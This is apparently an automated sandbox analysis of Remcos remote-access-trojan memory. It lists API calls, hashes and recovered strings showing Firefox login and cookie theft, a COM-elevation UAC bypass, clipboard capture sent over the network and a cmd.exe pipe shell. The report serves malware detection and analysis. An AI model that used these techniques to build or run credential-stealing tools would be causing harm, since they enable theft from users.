                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                                                                                                                                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                                                          • API String ID: 2994406822-18413064
                                                                                                                                                                                          • Opcode ID: f07381942693f405876167703fe07e0fb6aba62f4e18cf5d03aae295743b6246
                                                                                                                                                                                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                                                                          • Opcode Fuzzy Hash: f07381942693f405876167703fe07e0fb6aba62f4e18cf5d03aae295743b6246
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                                          • API String ID: 3018269243-13974260
                                                                                                                                                                                          • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                                                                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                          • API String ID: 1164774033-3681987949
                                                                                                                                                                                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenClipboard.USER32 ref: 004168FD
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0041690B
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                          • String ID: !D@
                                                                                                                                                                                          • API String ID: 3520204547-604454484
                                                                                                                                                                                          • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                          • API String ID: 3527384056-432212279
                                                                                                                                                                                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                                                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 297527592-0
                                                                                                                                                                                          • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                                          • API String ID: 3756808967-1743721670
                                                                                                                                                                                          • Opcode ID: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                                                                                                                                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b42a80951eb342c4a971769a7958462a684e848444859b94199bc40bd9fc38b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                                          • API String ID: 0-1861860590
                                                                                                                                                                                          • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                                          • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object_wcslen
                                                                                                                                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                          • API String ID: 240030777-3166923314
                                                                                                                                                                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3587775597-0
                                                                                                                                                                                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                          • String ID: JD$JD$JD
                                                                                                                                                                                          • API String ID: 745075371-3517165026
                                                                                                                                                                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                          • API String ID: 1164774033-405221262
                                                                                                                                                                                          • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                                                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                                                                                                                                                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2341273852-0
                                                                                                                                                                                          • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                          • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                          • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                                                          • API String ID: 341183262-3812160132
                                                                                                                                                                                          • Opcode ID: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
                                                                                                                                                                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8686161ca2437f15ec34d8a1a2640ae3a169738a9e5f3fbc3809040c5888124a
